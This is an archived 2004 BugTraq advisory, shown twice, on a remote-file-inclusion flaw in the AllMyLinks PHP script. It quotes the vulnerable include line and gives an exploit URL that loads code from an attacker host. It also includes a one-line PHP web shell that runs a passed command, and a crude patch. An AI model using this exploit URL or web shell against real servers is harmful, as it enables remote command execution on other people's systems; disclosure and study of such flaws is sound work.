BugTraq
Back to list
|
Post reply
AllMyLinks PHP Code Injection vulnerability
Feb 14 2004 10:19PM
Pablo Santana (m4dsk4t3r hotmail com)
******** AllMyLinks PHP Code Injection vulnerability ********
Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No
************************** Source ****************************
in /include/footer.inc.php
--------------------------------------------------------------
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
--------------------------------------------------------------
************************** Exploit ***************************
http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverp
ath]=http://[attacker]/&cmd=uname%20-a
in http://[attacker]/include/template.inc.php have :
------------------------
<?
system($cmd);
?>
------------------------
************************** Impact ****************************
Malicious user execute arbitrary commands on the server .
************************* Solution ***************************
in /include/footer.inc.php replace
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
for
if (isset($_AMLconfig['cfg_serverpath'])){
die("Don\'t Hack it :)");
}
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
************************** Credits ****************************
bnfx : bnfx (at) antisocial (dot) com [email concealed]
Mad_Skater : m4dsk4t3r (at) hotmail (dot) com [email concealed]
TechTeam Brazilian Crew .
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
******** AllMyLinks PHP Code Injection vulnerability ********
Product : AllMyLinks
Vendor : www.php-resource.net
Date : February 14, 2004
Problem : PHP Code Injection
Vendor Contacted ? : No
************************** Source ****************************
in /include/footer.inc.php
--------------------------------------------------------------
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
--------------------------------------------------------------
************************** Exploit ***************************
http://[target]/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverp
ath]=http://[attacker]/&cmd=uname%20-a
in http://[attacker]/include/template.inc.php have :
------------------------
<?
system($cmd);
?>
------------------------
************************** Impact ****************************
Malicious user execute arbitrary commands on the server .
************************* Solution ***************************
in /include/footer.inc.php replace
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
for
if (isset($_AMLconfig['cfg_serverpath'])){
die("Don\'t Hack it :)");
}
$AML_footer_get = require_once("".$_AMLconfig['cfg_serverpath']."/include/template.inc.php
");
************************** Credits ****************************
bnfx : bnfx (at) antisocial (dot) com [email concealed]
Mad_Skater : m4dsk4t3r (at) hotmail (dot) com [email concealed]
TechTeam Brazilian Crew .
[ reply ]